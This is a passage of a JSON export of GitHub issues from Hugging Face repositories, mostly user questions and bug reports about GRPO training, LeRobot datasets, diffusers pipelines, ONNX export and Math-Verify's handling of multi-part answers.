    "url": "https://github.com/huggingface/datasets/issues/7502",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-07T16:52:34Z",
    "updated_at": "2025-04-15T15:22:12Z",
    "comments": 2,
    "user": "pietrolesci"
  },
  {
    "repo": "huggingface/trl",
    "number": 3254,
    "title": "How to get completion_length?",
    "body": "I noticed that during GRPO training, `completion_length` is recorded. However, I found that it\u2019s not simply obtained by `len(completion)`. How is this calculated\u2014by tokens? Is it possible for me to access the `completion_length` for each sample?\n\n",
    "url": "https://github.com/huggingface/trl/issues/3254",
    "state": "open",
    "labels": [
      "\u2753 question",
      "\ud83c\udfcb GRPO"
    ],
    "created_at": "2025-04-07T15:02:04Z",
    "updated_at": "2025-04-11T03:10:20Z",
    "user": "Tuziking"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11220,
    "title": "Unconditional image generation documentation page not working as expected",
    "body": "### Describe the bug\n\nWhen consulting the documentation for [unconditional image generation](https://huggingface.co/docs/diffusers/using-diffusers/unconditional_image_generation), the last embedded page seems to contain an error that blocks it from being shown (see image below). This is @stevhliu's model stored in [this](https://huggingface.co/spaces/stevhliu/unconditional-image-generation) huggingface space. This space is also down in HuggingFace.\n\n\"Image\"\n\n### Reproduction\n\n- Go to https://huggingface.co/docs/diffusers/using-diffusers/unconditional_image_generation or https://huggingface.co/spaces/stevhliu/unconditional-image-generation, you will see that the unconditional image generation part is not loading\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\nNot relevant as it is documentation, not system related\n\n### Who can help?\n\n@stevhliu ",
    "url": "https://github.com/huggingface/diffusers/issues/11220",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-04-07T10:32:45Z",
    "updated_at": "2025-04-08T08:47:18Z",
    "comments": 2,
    "user": "alvaro-mazcu"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1275,
    "title": "How to use @xenova/transformers in a musl-based environment?",
    "body": "### Question\n\nHi,\n\nI encountered the following error when using @xenova/transformers:\n\n```bash\nError: Error loading shared library ld-linux-x86-64.so.2: No such file or directory (needed by /app/node_modules/onnxruntime-node/bin/napi-v3/linux/x64//libonnxruntime.so.1.14.0)\n```\nAfter investigating the issue, I found that it was caused by using the Node Alpine Docker image.\n(https://github.com/huggingface/transformers.js/issues/555)\n(https://github.com/huggingface/transformers.js/issues/376)\nSince Alpine Linux uses musl as its standard C library, and @xenova/transformers depends on onnxruntime-node (which is built against glibc), this incompatibility appears to be the root cause.\n\nI confirmed this by switching to the node:slim image (which uses glibc), and the error was resolved.\n\nHowever, I would really like to use @xenova/transformers in a musl-based environment (e.g., Alpine).\nIs there currently any way to run it on Alpine using musl?\nIf not, are there any plans to support musl or an alternative backend (e.g., onnxruntime-web with WASM) in Node.js?\n\nThanks in advance!",
    "url": "https://github.com/huggingface/transformers.js/issues/1275",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-04-07T06:34:51Z",
    "updated_at": "2025-10-07T21:23:36Z",
    "user": "ezcolin2"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 583,
    "title": "num_iterations in GRPOConfig does NOT DO what it is supposed to DO",
    "body": "Hi @qgallouedec and @lewtun \n\nThanks again for the amazing work ! I got the chance to try the v0.16.0 trl release in open-r1. \n\nI was excited about num_iterations which was supposed to make the training 6 times faster. Simply one needs something like:\n\n`training_args = GRPOConfig(..., num_iterations=4)\n`\n\nBut I did not see this happening. Using this simple receipe, it takes 58 steps and about 3 hours and 30 minutes to train the model on 8 A100 GPUs with `num_iterations=1`. But increasing it to `num_iterations=4` linearly increases the number of steps to 232 and increases the training time to 4 hours and 20 minutes under the same exact setup. \n\nAm I missing something here ? are we not supposed to re-use the generated data across multiple steps ? then why the training time has increased ? ",
    "url": "https://github.com/huggingface/open-r1/issues/583",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-06T15:57:43Z",
    "updated_at": "2025-04-12T06:00:21Z",
    "user": "ahatamiz"
  },
  {
    "repo": "huggingface/agents-course",
    "number": 412,
    "title": "[QUESTION] - Dummy Agent Library",
    "body": "_---\nDo you see the issue?\n\nThe answer was hallucinated by the model. We need to stop to actually execute the function! Let\u2019s now stop on \u201cObservation\u201d so that we don\u2019t hallucinate the actual function response.\n---_\n\nCan someone explain how the system is hallucinating in this example. I am kind of stuck on this. ",
    "url": "https://github.com/huggingface/agents-course/issues/412",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-04-06T09:44:14Z",
    "updated_at": "2025-04-06T09:44:14Z",
    "user": "NewTonDBA"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 940,
    "title": "Possible mismatch in observations.state metadata in Libero datasets on Hugging Face",
    "body": "Hello, \n\nI believe there might be a mistake in the Libero datasets hosted on huggingface/datasets.\nSpecifically, the issue is with the `observations.state` column. According to `meta/info.json`, the structure is described as:\n```\n\"observation.state\": {\n    \"dtype\": \"float32\",\n    \"shape\": [\n        8\n    ],\n    \"names\": {\n        \"motors\": [\n            \"x\",\n            \"y\",\n            \"z\",\n            \"rx\",\n            \"ry\",\n            \"rz\",\n            \"rw\",\n            \"gripper\"\n        ]\n    }\n}\n```\n\nHowever, when I check the values in the `observations.state` column, the last two values appear to be negative of each other. It seems like those two values are `robot0_gripper_qpos` from the environment observations. When I compare the values of observations from the environment, the first three values in the column are `robot0_eef_pos` and the second three seems like `robot0_eef_quat` (rx, ry, rz, rw) converted to axis angle representation.\n\nCould you please clarify or confirm whether this is an intended design or a labeling error?\n\nThanks for your work on LeRobot datasets!",
    "url": "https://github.com/huggingface/lerobot/issues/940",
    "state": "closed",
    "labels": [
      "question",
      "dataset",
      "stale"
    ],
    "created_at": "2025-04-06T04:18:55Z",
    "updated_at": "2025-10-19T02:32:09Z",
    "user": "ozgraslan"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11208,
    "title": "MultiControlNetModel is not supported for SD3ControlNetInpaintingPipeline",
    "body": "### Describe the bug\n\nWhen using `StableDiffusion3ControlNetInpaintingPipeline` with `SD3MultiControlNetModel`, I receive an error: \n\n`NotImplementedError: MultiControlNetModel is not supported for SD3ControlNetInpaintingPipeline.`\n\n### Reproduction\n\nExample reproduction code:\n\n```python\nimport os\nimport torch\nfrom diffusers.utils import load_image\nfrom diffusers.pipelines import StableDiffusion3ControlNetInpaintingPipeline\nfrom diffusers.models import SD3ControlNetModel, SD3MultiControlNetModel\nfrom diffusers import BitsAndBytesConfig, SD3Transformer2DModel\nfrom transformers import T5EncoderModel\n\n# Load images\nimage = load_image(\n    \"https://huggingface.co/alimama-creative/SD3-Controlnet-Inpainting/resolve/main/images/dog.png\"\n)\nmask = load_image(\n    \"https://huggingface.co/alimama-creative/SD3-Controlnet-Inpainting/resolve/main/images/dog_mask.png\"\n)\n\n# Initialize ControlNet models\ncontrolnetA = SD3ControlNetModel.from_pretrained(\"InstantX/SD3-Controlnet-Pose\")\ncontrolnetB = SD3ControlNetModel.from_pretrained(\"alimama-creative/SD3-Controlnet-Inpainting\", use_safetensors=True, extra_conditioning_channels=1)\ncontrolnet = SD3MultiControlNetModel([controlnetA, controlnetB])\n\n# Load transformer and text encoder\nnf4_config = BitsAndBytesConfig(load_in_4bit=True, bnb_4bit_quant_type=\"nf4\", bnb_4bit_compute_dtype=torch.bfloat16)\nmodel_id = \"stabilityai/stable-diffusion-3.5-large-turbo\"\nmodel_nf4 = SD3Transformer2DModel.from_pretrained(model_id, subfolder=\"transformer\", quantization_config=nf4_config, torch_dtype=torch.bfloat16)\nt5_nf4 = T5EncoderModel.from_pretrained(\"diffusers/t5-nf4\", torch_dtype=torch.bfloat16)\n\n# Initialize pipeline\npipe = StableDiffusion3ControlNetInpaintingPipeline.from_pretrained(\n    \"stabilityai/stable-diffusion-3.5-large-turbo\",\n    token=os.getenv(\"HF_TOKEN\"),\n    controlnet=controlnet,\n    transformer=model_nf4,\n    text_encoder_3=t5_nf4,\n    torch_dtype=torch.bfloat16\n)\n\npipe.enable_model_cpu_offload()\n\n# This fails with NotImplementedError\nresult_image = pipe(\n    prompt=\"a cute dog with a hat\",\n    negative_prompt=\"low quality, bad anatomy\",\n    control_image=[image, image],\n    num_inference_steps=30,\n    guidance_scale=7.5,\n    controlnet_conditioning_scale=[1.0, 1.0],\n    output_type=\"pil\",\n).images[0]\n```\n\n### Logs\n\n```shell\nError\n\n\nNotImplementedError: MultiControlNetModel is not supported for SD3ControlNetInpaintingPipeline.\n\n\nError occurs in `diffusers/pipelines/controlnet_sd3/pipeline_stable_diffusion_3_controlnet_inpainting.py` at line 1026. *Full error code*:\n\n\n---------------------------------------------------------------------------\nNotImplementedError                       Traceback (most recent call last)\nCell In[1], line 41\n     38 pipe.enable_model_cpu_offload()\n     40 # This fails with NotImplementedError\n---> 41 result_image = pipe(\n     42     prompt=\"a cute dog with a hat\",\n     43     negative_prompt=\"low quality, bad anatomy\",\n     44     control_image=[image, image],\n     45     num_inference_steps=30,\n     46     guidance_scale=7.5,\n     47     controlnet_conditioning_scale=[1.0, 1.0],\n     48     output_type=\"pil\",\n     49 ).images[0]\n\nFile ~/miniconda3/envs/bnb310/lib/python3.10/site-packages/torch/utils/_contextlib.py:115, in context_decorator..decorate_context(*args, **kwargs)\n    112 @functools.wraps(func)\n    113 def decorate_context(*args, **kwargs):\n    114     with ctx_factory():\n--> 115         return func(*args, **kwargs)\n\nFile ~/miniconda3/envs/bnb310/lib/python3.10/site-packages/diffusers/pipelines/controlnet_sd3/pipeline_stable_diffusion_3_controlnet_inpainting.py:1026, in StableDiffusion3ControlNetInpaintingPipeline.__call__(self, prompt, prompt_2, prompt_3, height, width, num_inference_steps, sigmas, guidance_scale, control_guidance_start, control_guidance_end, control_image, control_mask, controlnet_conditioning_scale, controlnet_pooled_projections, negative_prompt, negative_prompt_2, negative_prompt_3, num_images_per_prompt, generator, latents, prompt_embeds, negative_prompt_embeds, pooled_prompt_embeds, negative_pooled_prompt_embeds, output_type, return_dict, joint_attention_kwargs, clip_skip, callback_on_step_end, callback_on_step_end_tensor_inputs, max_sequence_length)\n   1023     width = latent_width * self.vae_scale_factor\n   1025 elif isinstance(self.controlnet, SD3MultiControlNetModel):\n-> 1026     raise NotImplementedError(\"MultiControlNetModel is not supported for SD3ControlNetInpaintingPipeline.\")\n   1027 else:\n   1028     assert False\n\nNotImplementedError: MultiControlNetModel is not supported for SD3ControlNetInpaintingPipeline.\n\n\nExpected Behavior\nI expect `StableDiffusion3ControlNetInpaintingPipeline` to support `SD3MultiControlNetModel`\n```\n\n### System Info\n\nVersions\n\nPython version: 3.10.16 (main, Dec 11 2024, 16:24:50) [GCC 11.2.0]\nPyTorch version: 2.2.0+cu118\nCUDA version: 11.8\nDiffusers version: 0.32.2\nTransformers version: 4.50.3\nAccelerate version: 1.7.0.dev0\n\n\n### Who can help?\n\n@yiyixuxu  @sayakpaul ",
    "url": "https://github.com/huggingface/diffusers/issues/11208",
    "state": "open",
    "labels": [
      "bug",
      "help wanted",
      "Good Example PR",
      "contributions-welcome"
    ],
    "created_at": "2025-04-04T12:39:10Z",
    "updated_at": "2025-05-11T15:03:00Z",
    "comments": 5,
    "user": "DanilaAniva"
  },
  {
    "repo": "huggingface/sentence-transformers",
    "number": 3308,
    "title": "How to load locally saved transformer models into sentence transformer?",
    "body": "I\u2019ve made some modifications to the NVEMBEDV2 model architecture and saved the updated version locally using `model.save_pretrained()`. However, when I try to wrap the saved model in a SentenceTransformer, I encounter a `KeyError: 'NVEmbedConfig'`.\n\nI checked the documentation, and while loading pretrained models seems straightforward, I\u2019m unsure how to handle models with a custom configuration and type. Is there a guide on how to properly load and integrate a locally modified transformer model into SentenceTransformer? \n\nI'm attaching a simple notebook for reproducibility and also the error. Thanks!\n\n[issue.ipynb.txt](https://github.com/user-attachments/files/19589812/issue.ipynb.txt)\n[requirements.txt](https://github.com/user-attachments/files/19589811/requirements.txt)",
    "url": "https://github.com/huggingface/sentence-transformers/issues/3308",
    "state": "open",
    "labels": [],
    "created_at": "2025-04-03T15:11:20Z",
    "updated_at": "2025-04-08T15:48:26Z",
    "user": "samehkhattab"
  },
  {
    "repo": "huggingface/datasets",
    "number": 7497,
    "title": "How to convert videos to images?",
    "body": "### Feature request\n\nDoes someone know how to return the images from videos?\n\n### Motivation\n\nI am trying to use openpi(https://github.com/Physical-Intelligence/openpi) to finetune my Lerobot dataset(V2.0 and V2.1). I find that although the codedaset is v2.0, they are different. It seems like Lerobot V2.0 has two version, one is data include images infos and another one is separate to data and videos.\n\nDoes someone know how to return the images from videos?\n\n\n\n",
    "url": "https://github.com/huggingface/datasets/issues/7497",
    "state": "open",
    "labels": [
      "enhancement"
    ],
    "created_at": "2025-04-03T07:08:39Z",
    "updated_at": "2025-04-15T12:35:15Z",
    "user": "Loki-Lu"
  },
  {
    "repo": "huggingface/blog",
    "number": 2781,
    "title": "How to submit revised version of Arxiv paper (v2) to Daily Papers",
    "body": "I would like to submit a revised version (v2) of our arXiv paper to Daily Papers, but the original submission (v1) was uploaded too long ago, so it's not eligible through the regular submission form.\n\nHowever, this v2 version was recently accepted to CVPR 2025, and it is a completely different paper compared to v1, both in content and contributions. It is based on a completely new idea and contains significant updates and improvements over the original version.\n\nIs there any way we can submit this revised version (v2) to Daily Papers?",
    "url": "https://github.com/huggingface/blog/issues/2781",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-02T09:20:30Z",
    "updated_at": "2025-11-03T15:22:36Z",
    "user": "eveningglow"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 927,
    "title": "How to train a model for VLN?",
    "body": "### System Info\n\n```Shell\nTo control four legs dogs.\n```\n\n### Information\n\n- [ ] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nrt\n\n### Expected behavior\n\ntret",
    "url": "https://github.com/huggingface/lerobot/issues/927",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-04-01T13:26:20Z",
    "updated_at": "2025-04-01T15:50:04Z",
    "user": "lucasjinreal"
  },
  {
    "repo": "huggingface/agents-course",
    "number": 391,
    "title": "[QUESTION] UNIT-3 not yet published ?",
    "body": "\"Image\"",
    "url": "https://github.com/huggingface/agents-course/issues/391",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-04-01T11:24:07Z",
    "updated_at": "2025-04-30T04:50:26Z",
    "user": "ynareshkalyan21"
  },
  {
    "repo": "huggingface/hub-docs",
    "number": 1664,
    "title": "Page: \"how to be registered as a provider\"?",
    "body": "",
    "url": "https://github.com/huggingface/hub-docs/issues/1664",
    "state": "closed",
    "labels": [],
    "created_at": "2025-04-01T10:55:01Z",
    "updated_at": "2025-04-03T13:03:26Z",
    "user": "hanouticelina"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 926,
    "title": "[Question] Deploy leRobot for a delta kinematic",
    "body": "Bonjour everyone, \nI'm currently working on the development of an **open source delta robot** via ROS. \nI'm wondering if any of you have a clue to help me integrate leRobot ACT algorithm to the custom kinematic of my delta. \n\nATM the inverse kinematic is managed by a marlin CNC firmware (on arudino mega), so we communicated via gcode, but considering moving to micro-ros to have direct angular control of the stepper motors and better ROS integration\n\n\n",
    "url": "https://github.com/huggingface/lerobot/issues/926",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-04-01T09:46:29Z",
    "updated_at": "2025-04-28T10:57:31Z",
    "user": "man0n0n0"
  },
  {
    "repo": "huggingface/optimum",
    "number": 2220,
    "title": "optimum-cli diffusion policy model issue",
    "body": "### System Info\n\n```shell\nHi,\nTrying to export a diffusion policy model to onnx format. From the error message and printed list of model types, it looks like \u201cdiffusion\u201d model cannot be exported to onnx.\nIs there a way to get around this?\n\noptimum-cli export onnx --model lerobot/diffusion_pusht --task reinforcement-learning /onnx/\n\nTraceback (most recent call last):\nFile \"/optimum-cli\", line 8, in\nsys.exit(main())\nFile \"/python3.10/site-packages/optimum/commands/optimum_cli.py\", line 208, in main\nservice.run()\nFile \"/python3.10/site-packages/optimum/commands/export/onnx.py\", line 265, in run\nmain_export(\nFile \"/python3.10/site-packages/optimum/exporters/onnx/main.py\", line 272, in main_export\nconfig = AutoConfig.from_pretrained(\nFile \"/python3.10/site-packages/transformers/models/auto/configuration_auto.py\", line 1008, in from_pretrained\nraise ValueError(\nValueError: Unrecognized model in lerobot/diffusion_pusht. Should have a model_type key in its config.json, or contain one of the following strings in its name:\n\nModel type form config.json:\n\"type\": \"diffusion\"\n\nSupported Models:\nalbert, align, altclip, audio-spectrogram-transformer, autoformer, bark, bart, beit, bert, bert-generation, big_bird, bigbird_pegasus, biogpt, bit, blenderbot, blenderbot-small, blip, blip-2, bloom, bridgetower, bros, camembert, canine, chameleon, chinese_clip, chinese_clip_vision_model, clap, clip, clip_vision_model, clipseg, clvp, code_llama, codegen, cohere, conditional_detr, convbert, convnext, convnextv2, cpmant, ctrl, cvt, data2vec-audio, data2vec-text, data2vec-vision, dbrx, deberta, deberta-v2, decision_transformer, deformable_detr, deit, depth_anything, deta, detr, dinat, dinov2, distilbert, donut-swin, dpr, dpt, efficientformer, efficientnet, electra, encodec, encoder-decoder, ernie, ernie_m, esm, falcon, fastspeech2_conformer, flaubert, flava, fnet, focalnet, fsmt, funnel, fuyu, gemma, gemma2, git, glpn, gpt-sw3, gpt2, gpt_bigcode, gpt_neo, gpt_neox, gpt_neox_japanese, gptj, gptsan-japanese, graphormer, grounding-dino, groupvit, hiera, hubert, ibert, idefics, idefics2, imagegpt, informer, instructblip, instructblipvideo, jamba, jetmoe, jukebox, kosmos-2, layoutlm, layoutlmv2, layoutlmv3, led, levit, lilt, llama, llava, llava-next-video, llava_next, longformer, longt5, luke, lxmert, m2m_100, mamba, mamba2, marian, markuplm, mask2former, maskformer, maskformer-swin, mbart, mctct, mega, megatron-bert, mgp-str, mistral, mixtral, mobilebert, mobilenet_v1, mobilenet_v2, mobilevit, mobilevitv2, mpnet, mpt, mra, mt5, musicgen, musicgen_melody, mvp, nat, nemotron, nezha, nllb-moe, nougat, nystromformer, olmo, oneformer, open-llama, openai-gpt, opt, owlv2, owlvit, paligemma, patchtsmixer, patchtst, pegasus, pegasus_x, perceiver, persimmon, phi, phi3, pix2struct, plbart, poolformer, pop2piano, prophetnet, pvt, pvt_v2, qdqbert, qwen2, qwen2_moe, rag, realm, recurrent_gemma, reformer, regnet, rembert, resnet, retribert, roberta, roberta-prelayernorm, roc_bert, roformer, rt_detr, rt_detr_resnet, rwkv, sam, seamless_m4t, seamless_m4t_v2, segformer, seggpt, sew, sew-d, siglip, siglip_vision_model, speech-encoder-decoder, speech_to_text, speech_to_text_2, speecht5, splinter, squeezebert, stablelm, starcoder2, superpoint, swiftformer, swin, swin2sr, swinv2, switch_transformers, t5, table-transformer, tapas, time_series_transformer, timesformer, timm_backbone, trajectory_transformer, transfo-xl, trocr, tvlt, tvp, udop, umt5, unispeech, unispeech-sat, univnet, upernet, van, video_llava, videomae, vilt, vipllava, vision-encoder-decoder, vision-text-dual-encoder, visual_bert, vit, vit_hybrid, vit_mae, vit_msn, vitdet, vitmatte, vits, vivit, wav2vec2, wav2vec2-bert, wav2vec2-conformer, wavlm, whisper, xclip, xglm, xlm, xlm-prophetnet, xlm-roberta, xlm-roberta-xl, xlnet, xmod, yolos, yoso, zoedepth\n\nThanks\n\n\nTo reproduce\nDownload model from HF\nUse optimum-cli to export the model\n\nPlatform\nLinux\n\nOS Version\nUbuntu 22.04.4 LTS\n\nONNX Runtime Installation\nReleased Package\n\nONNX Runtime Version or Commit ID\n1.21.0\n\nONNX Runtime API\nPython\n\nArchitecture\nARM64\n\nExecution Provider\nCUDA\n\nExecution Provider Library Version\n12.4\n```\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\nTo reproduce\nDownload model from HF\nUse optimum-cli to export the model\n\n### Expected behavior\n\nonnx export to succeed ",
    "url": "https://github.com/huggingface/optimum/issues/2220",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-04-01T04:59:53Z",
    "updated_at": "2025-06-11T13:57:20Z",
    "comments": 1,
    "user": "kraza8"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 923,
    "title": "Cannot install Lerobot",
    "body": "I am getting an error when the installation is building the av wheel. It is not passing this part of the installation",
    "url": "https://github.com/huggingface/lerobot/issues/923",
    "state": "closed",
    "labels": [
      "documentation",
      "question",
      "dependencies"
    ],
    "created_at": "2025-03-31T18:26:16Z",
    "updated_at": "2025-07-03T01:32:17Z",
    "user": "Prasit7"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 564,
    "title": "How to evaluate pass@16 for aime 2024 benchmark?",
    "body": "",
    "url": "https://github.com/huggingface/open-r1/issues/564",
    "state": "open",
    "labels": [],
    "created_at": "2025-03-31T09:27:02Z",
    "updated_at": "2025-03-31T09:27:02Z",
    "user": "Cppowboy"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11176,
    "title": "How to use attention_mask and encoder_attention_mask or apply prompts to specific areas in the image?",
    "body": "Hi, I'm aware of the attention_mask and encoder_attention_mask that exist in the forward function of the UNet2DConditionModel yet there are no examples on how to use this \n\nI would appreciate some help on that, thank you in advance\n@patrickvonplaten @Birch-san ",
    "url": "https://github.com/huggingface/diffusers/issues/11176",
    "state": "open",
    "labels": [
      "stale"
    ],
    "created_at": "2025-03-30T16:56:40Z",
    "updated_at": "2025-04-30T15:03:34Z",
    "user": "alexblattner"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 920,
    "title": "[Question] How to convert dataset locally",
    "body": "I've noticed that `convert_dataset_v20_to_v21.py` convert LeRobot dataset from v20 to v21 that've already been pushed to the hub. But is there a script to do with local dataset? ",
    "url": "https://github.com/huggingface/lerobot/issues/920",
    "state": "closed",
    "labels": [
      "question",
      "dataset",
      "stale"
    ],
    "created_at": "2025-03-30T13:32:50Z",
    "updated_at": "2025-10-13T02:30:26Z",
    "user": "Frozenkiddo"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 919,
    "title": "[Question] Why does \"action\" exist?",
    "body": "I am a beginner and I am very confused about it. What I can understand is that during my entire operation, I sampled at fixed time intervals. It's like a signal being collected by a letter. I only have to observe and what does action mean? Many data sets in the project have data with the column title `action`. Moreover, according to the expression of the project, `action` means the goal of the movement. However, this goal never seems to match the results in the observation. It looks like the robot never moves to its target. I was completely confused.",
    "url": "https://github.com/huggingface/lerobot/issues/919",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-30T10:45:57Z",
    "updated_at": "2025-03-31T07:50:19Z",
    "user": "ipc-robot"
  },
  {
    "repo": "huggingface/trl",
    "number": 3179,
    "title": "How to resume from the last checkpoint?",
    "body": "I want to continue training from the last checkpoint. How should I do it? I set resume_from_checkpoint=True in the GRPOConfig, but based on the output, it seems to start training from the first step. Do I also need to change the model to the checkpoint path?",
    "url": "https://github.com/huggingface/trl/issues/3179",
    "state": "closed",
    "labels": [
      "\u2753 question",
      "\ud83c\udfcb GRPO"
    ],
    "created_at": "2025-03-30T02:30:47Z",
    "updated_at": "2025-03-30T04:35:58Z",
    "user": "Tuziking"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11168,
    "title": "Sage Attention for diffuser library",
    "body": "**Is your feature request related to a problem? No\n\n**Describe the solution you'd like.**\nA clear and concise description of what you want to happen.\nIncorporate a way to add sage attention to the diffusers library: Flux pipeline, Wan pipeline, etc.\n\n**Describe alternatives you've considered.**\nNone\n\n**Additional context.**\nWhen I incorporated sage attention in the flux pipeline (text to image) I achieved a 16% speed advantage vs no sage attention.\nMy environment was the same save for including / excluding sage attention in my 4 image benchmark creation.\n\nHow to incorporate sage attention? We must consider that this only applies to the Transformer. With this in mind I did the following to the FluxPipeline. Obviously there must be a way to do this via a variable of sorts so that we may/may not run it:\n\nNeed some kind of indicator to decide whether to include or not! This must be done before the denoising step in the model pipeline.\n`        import torch.nn.functional as F\n        sage_function = False\n        try:\n            from sageattention import sageattn\n            self.transformer.scaled_dot_product_attention = F.scaled_dot_product_attention = sageattn\n            sage_function = True\n        except (ImportError):\n            pass\n\n        # 6. Denoising loop\n        with self.progress_bar(total=num_inference_steps) as progress_bar:\n            for i, t in enumerate(timesteps):\n                if self.interrupt:\n                    continue\n`\nAfter the denoising step we must remove sage attention else we get a VAE error due to Sage Attn wanting only torch.float16 or torch.bfloat16 dtypes which the VAE doesn't want:\n\n`        if output_type == \"latent\":\n            image = latents\n        else:\n            if sage_function:\n                self.transformer.scaled_dot_product_attention = F.scaled_dot_product_attention = torch._C._nn.scaled_dot_product_attention\n`\nHopefully this helps.\n",
    "url": "https://github.com/huggingface/diffusers/issues/11168",
    "state": "open",
    "labels": [
      "wip"
    ],
    "created_at": "2025-03-28T20:39:30Z",
    "updated_at": "2025-06-23T05:59:27Z",
    "comments": 12,
    "user": "ukaprch"
  },
  {
    "repo": "huggingface/agents-course",
    "number": 381,
    "title": "[QUESTION]LLM or Agent?",
    "body": "In the tutorial, a lot of the contents mislead to a wrong conectp with LLM and Agents. \n```\nThe Stop and Parse Approach\nOne key method for implementing actions is the stop and parse approach. This method ensures that the agent\u2019s output is structured and predictable:\n\nGeneration in a Structured Format:\nThe agent outputs its intended action in a clear, predetermined format (JSON or code).\n\nHalting Further Generation:\nOnce the action is complete, the agent stops generating additional tokens. This prevents extra or erroneous output.\n\nParsing the Output:\nAn external parser reads the formatted action, determines which Tool to call, and extracts the required parameters.\n\nFor example, an agent needing to check the weather might output:\n```\n\nThe agent can output? or the author means the LLM?",
    "url": "https://github.com/huggingface/agents-course/issues/381",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-28T15:36:45Z",
    "updated_at": "2025-04-30T04:50:54Z",
    "user": "joshhu"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 912,
    "title": "[Question]When will MultiLeRobotDataset available?",
    "body": "Hello, the MultiLeRobotDataset is very useful for training on large amounts of data; without it, training complex tasks would be difficult. However, I noticed that after the Simplify configs(#550) commit on January 31st,  MultiLeRobotDataset have been marked as unavailable(raise NotImplementedError(\"The MultiLeRobotDataset isn't supported for now.\")). Could you please let me know approximately when this functionality will be restored, or why it has been made unavailable?\n",
    "url": "https://github.com/huggingface/lerobot/issues/912",
    "state": "closed",
    "labels": [
      "question",
      "dataset",
      "stale"
    ],
    "created_at": "2025-03-28T09:16:06Z",
    "updated_at": "2025-10-22T02:30:53Z",
    "user": "Vacuame"
  },
  {
    "repo": "huggingface/agents-course",
    "number": 380,
    "title": "[QUESTION] Question on using HuggingFace space",
    "body": "First, the **best way to get a response fast is to ask the community** in our Discord server: https://www.hf.co/join/discord\n\nHowever, if you prefer you can ask here, please **be specific**.\n\nI am on AI Agents course now.\nI have trouble in using HuggingFace space.\nI studied this course at company so I have to open a firewall.\nSo I opened these port(80, 443. 8080) refer to following guide\n(https://huggingface.co/docs/hub/en/spaces-overview)\nBut my edge window can not display anything.\nIs there anything I'm missing?\n\nThank you for opening this course.\n\n![Image](https://github.com/user-attachments/assets/abe3ae2e-d0f6-4552-bb7c-c285c3daa57e)\n\n",
    "url": "https://github.com/huggingface/agents-course/issues/380",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-03-28T08:28:23Z",
    "updated_at": "2025-04-30T04:47:14Z",
    "user": "kjh0303"
  },
  {
    "repo": "huggingface/Math-Verify",
    "number": 47,
    "title": "Question: How to configure `verify` for strict multi-part answer checking?",
    "body": "Hi Math-Verify Team,\n\nI'm currently using `math-verify` for evaluating LLM outputs, specifically for questions that might require multiple answers (e.g., \"Find all X...\").\n\nI've observed that the `verify` function in `grader.py`, which seems to use logic similar to `any(product(gold, target))`, can return `True` even if the prediction only contains a subset of the required answers.\n\n**Example Observation:**\n\nIn my setup:\n* Ground Truth: `\"1331 and 1728\"` (appears to parse into something like `[1331, 1728]`)\n* Prediction: `\"1728\"` (parses to `[1728]`)\n* Result: `verify` returns `True`.\n\nWhile this makes sense if checking for *any* overlap, it seems too lenient for \"find all\" type questions where an exact match of all required elements is needed. This can lead to inflated scores or misleading reward signals in my use case.\n\n**Question:**\n\nIs there an existing configuration option or a recommended way within `math-verify` (perhaps via specific `ExtractionConfig` settings or ground truth formatting) to enforce a stricter check? Specifically, I'd like to verify if the *set* of predicted answers exactly matches the *set* of ground truth answers (considering mathematical equivalence).\n\nOr is the current behavior the intended default, and handling stricter set-based validation would require custom logic outside `verify` or modifications to the library?\n\nAny clarification or guidance on the best practice for achieving strict multi-part answer verification with `math-verify` would be greatly appreciated!\n\nThanks!",
    "url": "https://github.com/huggingface/Math-Verify/issues/47",
    "state": "closed",
    "labels": [],
    "created_at": "2025-03-27T16:54:52Z",
    "updated_at": "2025-07-01T19:31:51Z",
    "user": "TweedBeetle"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1259,
    "title": "3.2.4 has wrong env check in transformers.web.js",
